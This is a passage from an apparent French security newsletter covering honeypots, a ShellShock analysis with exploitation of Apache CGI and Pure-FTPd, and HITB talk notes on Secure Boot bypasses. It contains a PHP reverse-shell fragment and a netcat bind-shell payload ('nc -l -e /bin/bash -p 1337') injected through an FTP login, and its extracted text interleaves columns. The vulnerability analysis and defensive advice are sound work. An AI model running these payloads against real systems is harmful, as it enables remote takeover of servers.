$sock = fsockopen($ip, $port, $errno, $errstr, 30); }
if (!$sock) { exit(1);
printit( $errstr ($errno) ); ?>
13

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Les Honeypots

De cette manire, le pirate est en mesure dexcuter des ments malveillants relevs par Dionaea. Cela permet par
commandes systmes arbitraires distance, avec les pri- exemple de sortir une liste des systmes compromis
vilges de lutilisateur excutant le serveur Web. Dans le
meilleur des cas, cet utilisateur aura des privilges relati- Concernant Kippo, le pot de miel nous a permis de rcu-
vement restreints, et dans le pire, il sagira de lutilisateur prer plusieurs kits dexploitation gnriques (tels que
root , donnant ainsi au pirate les privilges les plus Gosh ) ou dautres outils pirates tels que psyBNC,
levs sur le serveur compromis. pour lesquels des analyses ont dj t publies sur In-
La vulnrabilit exploite par le pirate pour mener cette ternet. Loutil nous a aussi permis de suivre les actions
attaque est prsente en dtail dans larticle de lActuS- ralises par les pirates aprs stre connects notre pot
cu #36. de miel (tlchargement de fichier, ajout de compte, mo-
dification de mot de passe ).
Il est possible dobserver dautres types dattaques simi-
laires ciblant, par exemple, les interfaces dadministration Enfin, les deux outils nous ont permis dobtenir des infor-
telles que la JMX ou la web console, ou encore phpMyAd- mations telles que les couples didentifiant et de mot de
min. passe utiliss par les pirates, et ce pour de nombreux ser-
vices (SSH bien sr, mais aussi MSSQL, SMB, FTP, SIP).
Hormis ce type dattaque, lhoneypot a t en mesure de Prs de 25 000 couples didentifiant et de mot de passe
tlcharger de nombreux fichiers suspects qui ont t au- ont ainsi t tests sur le serveur Kippo sur une priode
tomatiquement soumis pour analyse sur une sandbox en dune dizaine de jours. Sur une priode dun peu plus
ligne. Ce type danalyse est intressant, mais une fois de dun mois, 3500 systmes distincts et priori compromis
plus, demande un retraitement manuel pour interprter, se sont connects aux diffrents services exposs par
minima, les traces identifies dans le rapport, ainsi que notre pot de miel Dionaea. Une centaine de couples lo-
pour les corrler avec les lments observables caractri- gin/mot de passe ont t tests sur les serveurs MySQL
sant le SI de lentreprise. et MsSQL.

Dans le cas ou le pot de miel serait expos non pas sur


Internet, mais directement au sein de la DMZ ou du LAN, Do it Yourself
ce type de rapport permet dobtenir une vision relative-
ment prcise de la menace, avec les principaux indica- ce sujet, lENISA avait publi la fin de lanne 2012 un
teurs qui la caractrise : processus crs, fichiers et clefs guide dtaill prsentant un grand nombre de logiciels
de registres manipuls, connexions rseau tablies ; tout disponibles pour mettre en place un honeypot [5].
cela accompagn dans le meilleur des cas dune analyse
statique des fichiers impliqus. Ces informations pourront Afin dapprendre manipuler un honeypot, lENISA pro-
alors tre utilises par lquipe scurit ou lquipe en pose un document regroupant un ensemble dexercices
charge de la rponse incident pour traiter la menace. drouler pour commencer prendre en main ce type
doutil. Ce TP permet entre autres de manipuler Thug, un
logiciel permettant de simuler le comportement dun na-
vigateur sur un site. Ce type doutil permet didentifier les
actions ralises par un site suspect sur un ordinateur, en
fonction de sa configuration. En effet, le comportement
des outils malveillants mis en place par un pirate diffre
en fonction du navigateur cibl.

Les exercices de lENISA sont disponibles sur le site de


lagence europenne.

> Conclusion
Enfin, le stockage des informations remontes tant ra- Finalement, si lon a peu ou pas de temps consacrer
lis en grande partie dans une base de donnes SQLite, lanalyse des remontes, on peut douter de lintrt dex-
il est relativement simple dtendre Dionaea pour gn- poser un honeypot sur Internet, tant la quantit dinfor-
rer priodiquement des rapports illustrant les comporte- mations remontes est importante. Cependant, plac sur
14
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
un primtre plus restreint tel que dans un LAN ou une
DMZ, les remontes dun tel outil pourront venir compl-
ter la vision rapporte par des sondes de type IDS.

Rfrences

+ [1] Blog des dveloppeurs du projet Dionaea


http://carnivore.it/

+[2] Outils post-exploitation gosh et EnergyMech


http://blog.infosanity.co.uk/2010/07/21/exa-
mple-of-post-exploit-utilities/

http://bitsmash.wordpress.com/2012/11/06/taking-a-
closer-look-at-some-malicious-irc-bots-caught-in-kippo-ho-
neypot/

+ [3] Shellpot
https://github.com/threatstream/shockpot

http://threatstream.com/blog/shockpot

+ [4] Cadre lgal des Honeypots


http://actes.sstic.org/SSTIC04/Droit_et_honeypots/SS-
TIC04-article-Barel-Droit_et_honeypots.pdf

http://actes.sstic.org/SSTIC04/Droit_et_honeypots/SS-
TIC04-Barel-Droit_et_honeypots.pdf

http://www.arrouan.be/blog/?p=73

http://www.symantec.com/connect/articles/honey-
pots-are-they-illegal

+ [5] Guide et exercices de lENISA


http://www.enisa.europa.eu/activities/cert/support/
proactive-detection/proactive-detection-of-security-inci-
dents-II-honeypots

https://www.enisa.europa.eu/activities/cert/support/exer-
cise/files/Honeypots_CERT_Exercise_Toolset.pdf

http://ww.enisa.europa.eu/ftp/ENISA-Honeypot-Exercise.
ova

15

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Analyse de la faille ShellShock
Le 24 septembre dernier, la vulnrabilit rfrence CVE-2014-6271, plus connue sous le nom de ShellShock , a t
divulgue par un franais : Stphane Chazelas. La faille affecte Bash, linterprteur de commandes utilis par dfaut dans
la plupart des distributions Linux et dans de nombreux autres systmes (Unix, Mac OS, etc.).

Cette dcouverte a provoqu un vritable raz-de-mare parmi les diffrents acteurs du march. Quils soient experts en
scurit, administrateurs systme ou diteurs de logiciels, la faille touche un outil trs largement utilis sous tous les sys-
tmes de type Unix depuis plus dune vingtaine dannes.

Ds le lendemain de sa publication, la faille a t trs largement exploite sur Internet, notamment au travers de services
Apache. Retour sur cette vulnrabilit qui a pratiquement surclass Heartbleed.

par Clment MEZINO, Charles DAGOUAT et Etienne BAUDIN

ShellShock

spettacolopuro

> Introduction En effet, Bash interprte les commandes places aprs la


dfinition dune fonction lintrieur dune variable den-
Quest-ce que bash ? vironnement. Ds lors, un utilisateur mal intentionn peut
dtourner le comportement de Bash et exploiter la faille
Bash est un shell aussi connu sous le nom dinterprteur de afin de prendre le contrle dun systme distance.
commandes. Il sagit dun outil avec lequel un utilisateur
peut interagir pour raliser diffrentes actions en ligne de
commande. Cet outil est intgr par dfaut dans la majorit Et cest quoi une variable denvironnement ?
des distributions Linux existantes, et est galement dispo-
nible dans un grand nombre dautres systmes (Mac OS X, Une variable denvironnement est un paramtre dcrivant
Unix, appliance, systmes embarqus, ...). une partie du contexte dans lequel un programme est lan-
c par un utilisateur afin de sexcuter. Par exemple, on
peut retrouver dans ce type de variables, le nom de lutili-
Quelle est la vulnrabilit ? sateur, le PATH dans lequel seront recherchs les ex-
cutables par le systme, ou encore le nom de linterprteur
La vulnrabilit provient dune erreur de traitement des va- de commandes. Il est possible de voir la liste des variables
riables denvironnement dfinissant une fonction au sein denvironnement en entrant la commande env dans un
16 de linterprteur de commandes. terminal.

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Prsentation de la vulnrabilit En effet, bien que Bash nait pas pour vocation tre expo-
s directement sur Internet, certaines solutions techniques
Origine de la faille peuvent aboutir une telle situation, sans que lon sen
rende forcment compte.
La faille de scurit identifie par Stphane Chazelas a pour
origine le traitement effectu par Bash sur les variables La faille affecte toutes les versions de Bash publies durant
denvironnement dfinissant une fonction. En effet, ds les 20 dernires annes ; depuis la version 1.14 (publie en
lors quune telle variable est utilise, le logiciel excute les 1994), jusqu la version 4.3 publie en fvrier dernier. De
commandes places aprs la dfinition de la fonction. fait, cet interprteur est install par dfaut sur de nombreux
systmes Linux, Unix, OS X, De plus, ce type de systme
Ce comportement nest bien sr pas prvu par les dve- tant souvent utilis comme socle au sein des boitiers
loppeurs et nest donc pas document, ni mme connu. commercialiss par les diteurs de solutions de scurit,
un trs grand nombre de produits embarquent galement
En effet, lors de la dfinition dune fonction dans lenvi- ce composant vulnrable. ShellShock est une vulnrabilit
ronnement, il est possible dy ajouter des lments qui dautant plus critique que de nombreux logiciels (Procmail,
pourront tre excuts. Ds lors, et en fonction du contexte Exim, CUPS, etc.) implmentent diffrents protocoles (SSH,
dutilisation de Bash, il est possible pour un attaquant de DHCP, FTP) ou modules (Apache/mod_cgi) utilisant linter-
dtourner le comportement de Bash et de raliser une l- prteur Bash par dfaut.
vation de privilges localement sur un systme, voire den
prendre le contrle distance. Il est noter que llvation Certains craignent dailleurs des dgts irrversibles pour
de privilges sexploite de manire indirecte, et ncessite certains objets connects sur lesquels il est souvent impos-
quun programme soit excut dans le contexte dun utili- sible de mettre jour les lments basiques tels que lin-
sateur disposant de plus de droits. terprteur de commandes.

Nous avons dcid de nous intresser aux rpercussions


Premire PoC de ShellShock travers deux logiciels grand public, Apache
(Serveur Web) et Pure-FTPd (Serveur FTP).
Le code dexploitation le plus simple, afin de savoir si votre
interprteur de commandes est vulnrable, est le suivant : > INFO
env X='() { :; }; echo "Vous etes vulnerable a ShellShock"' Au travers de lexploitation de ShellShock, les cher-
bash -c id cheurs observent lvolution des attaques des pirates
Cette commande peut se dcomposer en trois parties : Des chercheurs ont analys lvolution des attaques tirant parti

+
de la faille ShellShock, qui affecte linterprteur Bash.
Cration de la variable denvironnement X et dfini-
tion dune fonction vide () {:;} ; Initialement, ils ont dcouvert deux codes dexploitation per-
mettant le tlchargement puis linstallation dun bot IRC crit
+Ajout dune commande non autorise la variable den-
vironnement echo " Vous etes vulnerable a ShellShock " ;
en Perl. Ces deux lments ont des fonctions relativement ba-
siques et sont encods en base64.

+Appel du programme vulnrable Bash en excutant la


commande id (bash -c id) ;
Ils ont par la suite dcouvert un autre exploit crit en C, permet-
tant galement linstallation dun bot IRC. Cependant, celui-ci
dispose de fonctionnalits avances, lui permettant par exemple
dassurer sa persistance : il est capable de se mettre jour ou de
la lecture de la variable denvironnement X , la com- rinfecter un systme assaini chaque semaine.
mande situe aprs le point-virgule marquant la fin de la
dfinition de la fonction sera elle aussi excute, ce qui ne Enfin, ils ont analys un dernier code dexploitation faisant
devrait pas tre possible. preuve dune plus grande complexit. Celui-ci commence par
empcher lenregistrement des commandes Bash entres sur
le systme vulnrable. Il tlcharge ensuite un script malveillant
Si le message Vous etes vulnerable a ShellShock saf-
puis lexcute. Ce script est une variante du malware connu sous
fiche sur votre terminal, alors votre interprteur est vuln- le nom Linux.Tsunami, qui permet de raliser des attaques de
rable ! dni de service distribu. Il assure ensuite sa persistence sur le
systme et force les mises jour rgulires de ses composants.
Ds le lendemain de sa publication, la faille a t trs large- Enfin, le script corrige la vulnrabilit Bash afin dempcher
ment exploite sur Internet, notamment travers les mo- dautres attaquants de prendre le contrle du systme.
dules mod_cgi des serveurs Apache.
travers ces diffrentes attaques, les chercheurs ont pu obser-
ver lvolution des techniques dexploitation de cette vulnrabi-
lit, ainsi que la monte en comptence des pirates. Ils ont ainsi
Une vulnrabilit plus critique quelle nen a lair
not des amliorations dans les mcanismes de persistance, de
dissimulation et dinfiltration, ainsi que la ct comptitif entre
Le jeu de mots (Shell vs ShellShock, qui signifie Traumatis les attaquants.
en anglais) ayant donn son nom cette faille illustre bien
son importance. 17

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
ShellShock

> Analyse de deux produits vuln- Dans les logs de connexion, on peut remarquer que le script
est appel en mme temps que la page.
rables

Analyse de ShellShock sur Apache


Pour exploiter la faille ShellShock, il nous suffit de rensei-
Apache est un des serveurs HTTP les plus utiliss au monde. gner un paramtre envoy dans la requte HTTP qui sera
Il permet de diffuser du contenu sur Internet trs rapide- rutilis en tant que variable denvironnement par Bash.
ment et simplement. Une des forces dApache rside dans Les champs User-Agent ou Referer des en-ttes HTTP
sa capacit utiliser diffrents modules permettant lex- rpondent parfaitement ces critres.
ploitation de diffrentes technologies. Parmi les modules
les plus connus, on compte mod_php, mod_cgi, mod_auth,
etc.

Cest grce au module mod_cgi que lattaque est pos-


sible sur un serveur Apache. Ce module permet dutiliser
des scripts CGI. La CGI est une interface ayant la particularit
dexcuter un programme et de retourner le contenu g-
nr au serveur HTTP plutt que de simplement renvoyer
le contenu dun fichier (fichier HTML, image). Les interfaces
CGI sont indpendantes de tout langage de programmation
puisquelles utilisent les flux standards et les variables den- En modifiant le champ Referer de len-tte HTTP par une
vironnement. dclaration de fonction suivie de plusieurs commandes,
celles-ci seront excutes sur le serveur distant. En rejouant
Ainsi, si un utilisateur utilise des commandes Bash lint- la requte HTTP ainsi modifie, nous pourrons remplacer le
rieur dun script CGI, son site web est vulnrable ShellS- contenu du fichier par le mot vuln suivi du rsultat de la
hock. commande id sur le serveur :

un utilisateur mal intentionn


peut dtourner le comportement de Bash et
exploiter la faille afin de prendre le contrle
dun systme distance Un administrateur systme vigilant pourra tout de mme
dtecter cette attaque, puisquelle reste visible dans les
Nous avons mis en place un environnement prconfigur logs du serveur Apache :
avec un serveur Apache excutant un script CGI avec une
version de Bash vulnrable ShellShock afin de tester cette
vulnrabilit. Nous avons cr une page shellshock.php,
sur laquelle on affiche le rsultat dun script cgi nomm
shellshock.sh . Cela signifie que le script shellshock.sh
est excut travers linterface CGI et que son rsultat est Si vous utilisez un serveur Apache excutant des scripts CGI
envoy sur la page web. interagissant avec Bash, nous vous recommandons dappli-
quer les patchs disponibles ou de mettre jour votre sys-
tme.

On pourrait galement tablir une rgle sur un IDS/IPS per-


mettant de dtecter les caractres permettant une dclara-
tion de fonction en Bash pour tre alert.

18
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Analyse de ShellShock sur Pure-ftpd IP) sur le socket ftpd.sock vers le dmon pure-ftpd
sous forme de variables denvironnement. Ces dernires
Pure-FTPd est un serveur FTP sous licence BSD rput pour peuvent tre gres par Bash au travers du script handler.
sa scurit, sa fiabilit et sa simplicit dutilisation. Il sup- sh cr prcdemment.
porte notamment lauthentification par PAM, par une base
de donnes MySQL, mais aussi par la cration dutilisateurs Nous utilisons enfin deux commandes pour dfinir le socket
virtuels, ne disposant pas de compte sur le systme sous- de connexion utiliser [1] et indiquer Pure-FTPd dutiliser
jacent. ce socket pour dialoguer avec le module en charge dim-
plmenter le mcanisme dauthentification externe [2] et
Nous allons voir que ce sont les diverses mthodes dau- dmarrer le serveur.
thentification supportes par le logiciel qui le rendent lui
aussi vulnrable. En effet, en nous basant sur une preuve [1] : # pure-authd -B -s /tmp/ftpd.sock -r /tmp/handler.sh
de concept disponible en libre accs sur Internet, nous [2] : # pure-ftpd -B -l extauth:/tmp/ftpd.sock
avons pu prendre le contrle dune machine sur laquelle
tait install Pure-FTPd. Il ne nous reste plus qu nous connecter au serveur FTP
ainsi cr en spcifiant un nom dutilisateur ou un mot de
La mthode est simple. Nous avons dabord cr une ma- passe correspondant la dclaration dune variable den-
chine virtuelle base sur une distribution Linux Debian sur vironnement dfinissant une fonction suivie dune com-
laquelle nous avons install le service Pure-FTPd. Une des mande qui sera interprte par Bash sur le serveur FTP. Le
conditions ncessaires lexploitation de la vulnrabilit mot de passe na ainsi pas besoin dtre connu puisque
est dutiliser un module externe pour grer lauthentifica- la commande utilise dans la variable de lutilisateur sera
tion sur le serveur FTP. Pour cela, nous avons rcupr un dj excute.
script Bash, jouant le rle d handler (un gestionnaire)
permettant lauthentification. Les paramtres utiliss dans
ce fichier sont disponibles dans la documentation officielle
de Pure-FTPd. Cest un script (dans notre cas) basique qui
permet dautoriser, ou dinterdire, laccs un utilisateur.
Dans notre contexte, la seule vrification ralise est sur
lidentifiant de lutilisateur. Si le login de lutilisateur est
john , le serveur autorise laccs un rpertoire dfini avec
lidentifiant utilisateur et le groupe dfinis dans le fichier.
Connexion au serveur FTP et exploitation de la faille Shellshock

Dans notre exemple, nous avons utilis une commande ba-


se sur netcat pour avoir un accs direct sur la machine
distante travers le port 1337 en plus de la dclaration de
fonction permettant lexploitation de la faille.

Largument rcupr par authd sera alors :


Contenu du handler
$AUTH_ACCOUNT = () { :; } ; nc v l e /bin/bash p 1337
La variable denvironnement utilise par dfaut reprsen-
La commande en rouge sera ainsi excute par le dmon et
tant le login, $AUTH_ACCOUNT est transmise par lutili-
donc transmise Bash qui lexcutera. Nous navons ainsi
sateur au serveur FTP, puis au dmon pure-authd .
pas besoin de mot de passe puisque la commande mal-
Les champs sont les suivants :
veillante est dj excute lorsque le systme nous le de-

+ auth_ok mis 1 pour autoriser la connexion luti-


lisateur.
mande. En effectuant une connexion sur la machine avec le
port 1337 prcdemment ouvert par netcat, nous pouvons
effectuer les commandes que nous voulons sur celle-ci et

+ uid et gid dsignant lid utilisateur et lid du


groupe assigner lutilisateur connect.
ainsi la compromettre.

+ dir pour le chemin par dfaut vers le rpertoire de


lutilisateur.

Grce cette mthode dauthentification, les variables


denvironnement telles que lutilisateur et le mot de passe
demands par le dmon excutant Pure-FTPd sont ex-
cuts par Bash. Cest ce qui rend Pure-FTPd vulnrable
ShellShock.
Ainsi, le dmon pure-authd va convertir les informations
envoyes par lutilisateur (login, mot de passe, adresse Connexion la machine distante via netcat 19

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
ShellShock

> Correctifs de scurit et conclusion


Cette faille ne touche pas Pure-FTPd en lui-mme, ni
Apache cest pourquoi il nexiste aucune mise jour pour
ces logiciels. Cependant, il en existe pour Bash. Nous vous
recommandons une mise jour de votre systme ou lins-
tallation des divers patchs disponibles pour en bnficier.

noter que, selon le systme dont vous disposez, la vuln-


rabilit pourrait ntre colmate que partiellement. En ef-
fet, dautres failles de scurit rfrences CVE-2014-7169,
CVE-2014-7186, CVE-2014-7187 et CVE-2014-6277 sont ap-
parues suite la publication de diffrents correctifs de s-
curit incomplets pour ShellShock. Des correctifs de scurit
pour ces vulnrabilits sont galement disponibles.

Bien que lutilisation dun module dauthentification ex-


terne de Pure-FTPd travers Bash ne soit pas une des confi-
gurations du serveur des plus rpandues, elles peuvent
subsister chez des utilisateurs imprudents souhaitant une
installation rapide et facile dun serveur FTP.

Nous vous recommandons dtre prudent lors de lutilisa-


tion dapplications pouvant reposer sur Bash notamment
pour des systmes dauthentification critiques. A noter que
diffrents programmes trs utiliss sont galement vuln-
rables ce type dattaque, notamment le trs rput Open-
VPN (dans le cas de configurations spcifiques)

Rfrences

+http://blog.xmco.fr

20
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Confrences scurit

Hack In The Box


par Julien TERRIAC
et Marc LEBRUN

http://photos.hitb.org/
KEYNOTE 1: Security at the End of the Universe - Katie ts, les chercheurs en scurit informatique ralisent un
Moussouris excellent travail, puisque dans cet univers hostile, ils conti-
nuent, chaque jour, de trouver et didentifier de nouvelles
La premire keynote de la confrence a t prsen- vulnrabilits.
te par Katie Moussouris qui est lorigine du nouveau
bounty-program lanc le 26 juin 2013 par Microsoft.

Son postulat est le suivant : toutes les applications que


nous utilisons tous les jours ont t cres par des hu-
mains. Ces millions de lignes de code doivent donc conte-
nir des erreurs qui ont t cres et introduites de ma-
nire fortuite. En effet, les dveloppeurs sont soumis de
nombreuses contraintes (stress, planning charg, ) qui
les empchent de coder sereinement. Toutes ces erreurs
se traduisent par des vulnrabilits. Le rle des chercheurs
en scurit est donc ncessaire afin didentifier ces failles.

Malheureusement, il existe un norme foss entre les cher-


cheurs en scurit et les vendeurs. Lindustrie logicielle na
jamais russi comprendre et grer les problmatiques Lensemble des personnes travaillant dans le secteur de
lies la dcouverte des vulnrabilits. Pour Katie, il faut la scurit informatique est sensibilis aux problmatiques
tout dabord sassurer que tous les intervenants parlent le que ce sujet engendre. Par exemple, aucun consultant en
mme langage. Il est donc important dtablir des stan- scurit informatique ne serait prt tre passager au sein
dards comme le Vulnerability Disclosure . Ils avaient des nouvelles voitures Google (voitures automatiques ne
pour but de normaliser le processus aboutissant la pu- ncessitant pas de conducteur). Lorsque des chercheurs
blication des vulnrabilits. lheure actuelle, quelques tudient ce type de projets, ils identifient immdiatement
standards existent, mais aucun nest rellement utilis de les risques lis lutilisation de tels engins.
manire globale. Nanmoins, malgr toutes ces difficul- 21

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Bien que le concepteur soit Google (la socit propose g- Setup for Failure: More Ways to Defeat SecureBoot
nralement des produits de bonne qualit en matire de Corey Kallenberg, Sam Cornwell, Xeno Kovah et John Bu-
scurit) ce qui fait avancer les voitures, ce sont les lignes Derworth
de codes cres par les hommes. Des vulnrabilits seront
donc forcment dcouvertes par les chercheurs un jour. + Slides
http://haxpo.nl/wp-content/uploads/2014/01/D1T2-More-
Un autre concept introduit se nomme Fuzzing the chain of Ways-to-Defeat-Secure-Boot.pdf
influence . Il sagit de sensibiliser les personnes ayant un
fort impact sur la vie quotidienne des utilisateurs. En effet, Cette prsentation sest concentre sur les diffrentes fa-
les membres du Congrs amricain lgifrent autour des ons de contourner le dernier mcanisme de scurit im-
nouvelles technologies. Malheureusement, ils sont, pour la plment au sein des BIOS (UEFI) appel Secure Boot .
plupart, plutt trs gs et ne comprennent donc pas tous
les concepts sous-jacent aux nouvelles technologies et plus Ces mcanismes bas-niveau sont gnralement les der-
particulirement les risques quelles engendrent. Ceci est nires barrires contre linstallation des programmes mal-
d une volution trs rapide du monde dans lequel nous veillants appels rootkit . En sinstallant au sein du BIOS,
voluons. Il suffit de faire le bilan des dix dernires annes. ils sont capables dinfecter le systme hte et de rester invi-
On a donc besoin de familiariser lensemble de cette popu- sibles mme aprs une rinstallation complte du systme
lation qui dispose dune influence importante sur lcosys- dexploitation.
tme li la scurit.
Cette protection, intgre au sein de lUEFI, permet de
Celle-ci nest pas compltement ignorante, grce aux m- nautoriser que le dmarrage des composants du systme
dias traditionnels qui relatent les principaux vnements dexploitation reconnus comme tant sains . Cette fonc-
majeurs comme la vulnrabilit HeartBleed . Il faut donc tionnalit vise interdire le dmarrage dun systme dex-
raliser que toutes les personnes travaillant dans le milieu ploitation corrompu par un rootkit.
de la scurit ont pour devoir de sensibiliser et dinitier
leurs proches aux problmatiques lies lusage des nou- Malheureusement, suivant la configuration ralise par le
velles technologies, du fait, entre autres, de leur scurit. constructeur, cette protection peut tre contourne de plu-
sieurs manires.
Selon Katie, il est important que tout le monde sorte de sa
zone de confort, quimporte son rle. Cest--dire quun ad- Avant de dcrire les aspects techniques voqus lors de la
ministrateur rseau apprenne pirater son propre rseau, prsentation, une vulgarisation des termes employs est
ou encore quun consultant en scurit informatique pro- ncessaire :
gramme des logiciels. Cette dmarche permettra de chan-
ger la vision globale dans le but davancer vers un monde
plus sensibilis et plus raliste face aux problmes lis la
+ SPI Flash : Serial Peripheral Interface Bus Flash fait rf-
rence la mmoire Flash.
scurit.
+BIOS : Basic Input Output System est un mini systme
dexploitation prsent sur la carte mre qui permet de ra-
liser des actions basiques dans le but de configurer le mat-
riel afin de dmarrer le systme dexploitation.

+ UEFI : Unified Extensible Firmware Interface est une nou-


velle norme qui va succder au BIOS.

+API : Application Programming Interface est un en-


semble normalis de fonctions permettant de raliser des
oprations standardises.

+ OEM : Original Equipment Manufacturer est un fabri-


quant dordinateur comme Dell ou HP par exemple.

+SMM : System Management Mode est un composant


trs bas niveau qui permet de grer les accs au matriel.

> 1. la Relax Policy

Suivant le support utilis (USB, carte PCI ) lexcution de


code peut tre autorise laide de cette option de confi-
guration. Pour cela, il faut vrifier la configuration de va-
riables qui sont hardcods dans lUEFI. En cas dutilisation
dun support autoris, un rootkit peut ainsi contourner le
22 Secure Boot.

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
HITB

Nanmoins sur le matriel test, un Dell Latitude E6430 depuis lespace mmoire utilisateur, permet de contourner
BIOS revision A12, la Relax Policy tait dsactive. le Secure Boot sur lensemble des systmes dexploita-
tion Windows 8. De plus, lors du lancement du rootkit, le
> 2. la variable EFI Setup systme dexploitation considrera quun Secure Boot
a t ralis.
Lactivation de la Secure Boot Policy dpend de la va-
leur, soit dune variable qui peut tre hardcode au sein
du matriel, soit dune variable au sein de lEFI que lon > 3. Contournement de la protection Intel SPI Flash Pro-
nommera setup . La lecture de cette variable est donc tection
ralise au dmarrage.
Certaines autres variables sont dites AT (Authenticated).
Elles ne peuvent pas tre modifies depuis le userland. Cela
est d lutilisation dune cl de chiffrement hardcode au
sein de la carte mre. Ces variables stockes au sein de la
mmoire Flash (SPI) de la carte mre contiennent des infor-
mations critiques comme les empreintes cryptographiques
des excutables contenus dans lEFI.

Afin de pallier aux attaques de type variable EFI Setup ,


Intel fournit un mcanisme de scurit qui interdit toute
modification des variables de la mmoire Flash depuis le
userland. Il sagit du registre BIOS_CNTL. Plus prcisment :

+ Le bit BIOS_CNTL.BIOSWE dfinit laccs en criture sur


la mmoire Flash.

+Le bit BIOS_CNTL.BLE permet un OEM dimplmenter


sa propre routine pour protger le bit BIOS_CNTL.BIOSWE.

Un autre mcanisme offrant la mme protection se nomme


Or, cette variable est dite Non Volatile . Elle est donc stoc- le Protected Range SPI Flash Protections . Il repose sur le
ke au sein dune mmoire flash et donc potentiellement bit HSFS.FLOCKDN et protge les accs en criture certains
modifiable (non hardcode). De plus, elle dispose du flag registres.
RT qui signifie RunTime Accessible . Cet espace m-
moire est donc accessible depuis le systme dexploitation
(comme pour une variable globale classique).

Afin de changer la valeur de la variable Setup sur les


systmes Windows 8, Microsoft a mis disposition une API
appele SetFirmwareEnvironmentVariable qui permet
de modifier les variables non volatile.s

Afin de tester lAPI, le chercheur a ralis un premier essai


en rinitialisant la valeur de la variable Setup 0. Cette
modification a eu pour consquence de mettre hors ser-
vice de manire dfinitive lordinateur portable Dell (tat
nomm bricked ). Lutilisation de cette API peut donc
permettre de raliser, de manire trs simple, une attaque
de type dni de service.

Bien sr, il est possible de configurer cette valeur de ma-


nire plus intelligente. En effet, en dfinissant la variable
Setup ALWAYS_EXECUTE , cela aura pour effet de
dsactiver la Secure Boot Policy .
Cette attaque, dcouverte par les quipes dIntel, ralisable 23

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Nanmoins, ces protections reposent sur la scurit du besoin dtre assimile par lensemble des OEM.
mode SMM qui va dcider qui peut crire ou non (mode Toutes ces vulnrabilits ne concernent pas uniquement
gatekeeper). Or, ce mode est vulnrable de nombreuses Windows mais tous les ordinateurs disposant dun UEFI.
attaques. La surface dattaque est dautant plus grande car
il existe de trs nombreux modules EFI qui utilisent le mode En conclusion, cette confrence fut la plus didactique des
SMM. Par exemple, 495 modules EFI ont t recenss sur le deux jours. Malgr la complexit du sujet, lorateur a su
Dell Latitude E6430. laborder de manire claire et simple. Si des questions
restent encore en suspens, nous vous conseillons de lire ses
Un moyen simple de contourner ces protections serait de slides qui sont trs bien ralises.
dsactiver le SMM afin de pouvoir modifier les variables du
BIOS. Cette action (qui dpend du chipset) est facilement
ralisable si lordinateur cibl na pas activ la protection The NSA Playset
SMI_LOCK. Or, cette configuration non scurise est assez Michael Ossmann (Founder, Great Scott Gadgets)
commune. Sur 8005 ordinateurs tests, 3216 (soit 40%)
navaient pas cette protection active. Ce chiffre peut tre
accentu en effectuant un roll back sur la version du
+ Slides
http://haxpo.nl/wp-content/uploads/2014/01/D1T1-The-
BIOS, opration qui est trs souvent autorise. NSA-Playset.pdf

Une attaque possible est donc de dsactiver le SMM et Avant daborder le sujet de sa confrence, Michael Ossman
dajouter une nouvelle empreinte de notre rootkit au sein a voulu clarifier quelques points. Malgr le sujet abord du-
de la liste des excutables considrs comme tant sains rant la prsentation, il est fier de son gouvernement. Pour
par le Secure Boot . lui, il est tout fait possible de garder un esprit critique sur
ces rvlations tout en portant une grande estime envers
son pays, les tats-Unis.
> Mais qui est responsable de cette vulnrabilit ?
Cette confrence avait pour but de prsenter lensemble
Le dveloppement des BIOS a t ralis de faon disparate des outils utiliss par la NSA (fuites des documents par Ed-
et alatoire. Chacun ralisant sa propre implmentation ward Snowden) et dessayer dlaborer une version Open
dans son coin. Source. La motivation de Michael Ossman : Parce que cest
Nanmoins, la plupart des constructeurs (OEM) utilisent fun .
limplmentation faite par American Megatrends.
La prsentation sest concentre sur la partie matrielle.

Voici la liste de nos gadgets prfrs :

+ Nom de code : Nightstand


Utilit : outil portable dinjection WiFi et de compromission
des OS WinXP
Configuration Open Source : antenne directionnelle + am-
plificateur + adaptateur wireless + ordinateur portable
Analyse de lorateur : Limplmentation est assez basique.

+ Nom de code : Sparrow II


Utilit : analyse des rseaux Wi-Fi
Configuration Open Source : logiciel Kistmet + openWRT
(ou un tlphone type N900).
Analyse de lorateur : Limplmentation est assez basique.

> Axes dattaque creuser : corruption mmoire

Un autre vecteur dattaque serait les corruptions mmoires,


par exemple travers les variables UEFI. En effet, ces va-
riables sont assez complexes (tailles consquentes, pro-
pritaires, ). Leur analyse syntaxique peut donc induire
des corruptions mmoires comme la clbre CVE-1999-046
(buffer overflow au sein de la variable denvironnement
TERM).

Les OEM nutilisent pas toutes les protections fournies par


Intel. Ils ont besoin de temps afin dassimiler lensemble
des outils dfensifs mis leur disposition. Ceci est d au ca-
ractre nouveau du standard UEFI. La technologie a encore
24
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
HITB

+Nom de code : Howlermonkey


Ce quil faut retenir de cette confrence est que mal-
gr toutes les informations dvoiles, il existe encore un
Utilit : metteur-rcepteur Bluetooth norme foss entre le monde Open Source et la NSA : la
Configuration Open Source : nimporte quel module Blue- miniaturisation. Il est actuellement impossible de raliser
tooth (par exemple Ubertooth). de tels gadgets de si petite taille. De plus, pour pouvoir les
Analyse de lorateur : Rien dimpressionnant, il sagit dun utiliser de manire discrte, il faudrait avoir galement le
simple metteur rcepteur. Il est possible de limplmenter service dinterception des colis dont dispose la NSA.
sur un im-me (mini-ordinateur permettant de communi-
quer par chat).
Reloading Java Exploits: Long Live Old JRE!
Donato Ferrante (Founder, ReVuln) & Luigi Auriemma
(Co-Founder, ReVuln)

+ Slides
http://revuln.com/files/Ferrante_Auriemma_Reloading_
Java_Exploits.pdf

Le langage de programmation Java a toujours t une cible


privilgie des pirates de part sa vaste utilisation (97% des
postes en entreprise ont une version de java installe, 3
